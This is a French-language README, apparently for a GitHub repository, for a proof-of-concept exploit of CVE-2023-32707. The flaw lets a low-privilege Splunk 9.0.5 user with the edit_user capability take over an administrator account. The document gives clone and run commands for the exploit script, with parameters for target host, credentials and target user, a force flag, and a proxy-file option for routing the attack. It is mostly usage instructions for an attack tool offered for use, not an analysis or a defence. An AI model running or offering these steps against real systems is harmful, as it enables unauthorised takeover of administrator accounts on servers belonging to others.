
Un exploit POC amélioré basé sur le CVE signalé sur exploitdb
Un POC amélioré basé sur le CVE signalé sur exploitdb
Exploit Title: Splunk 9.0.5 - Prise de contrôle du compte administrateur CVE: CVE-2023-32707
Ce script permet d'exploiter une vulnérabilité dans Splunk 9.0.5, conduisant à une prise de contrôle du compte administrateur. L'exploit utilise un utilisateur à faibles privilèges avec la capacité edit_user pour élever les privilèges.
pip3 install -r requirements.txt) :
Clonez le dépôt :
git clone https://github.com/9xN/CVE-2023-32707.git
cd CVE-2023-32707
Exécutez le script avec les paramètres requis :
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit
Remplacez <splunk_host>, <splunk_username>, <splunk_password> et <target_user> par les détails de votre serveur Splunk.
--host : Hôte Splunk ou adresse IP (obligatoire)--username : Nom d'utilisateur Splunk (obligatoire)--password : Mot de passe Splunk (obligatoire)--target-user : Utilisateur cible pour la prise de contrôle du compte (obligatoire)--force-exploit : Forcer l'exploit (optionnel)--proxy-file : Fichier contenant les paramètres du proxy (optionnel)Pour utiliser des proxys, spécifiez le --proxy-file avec le chemin d'un fichier contenant les paramètres du proxy.
Exemple :
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit --proxy-file proxies.txt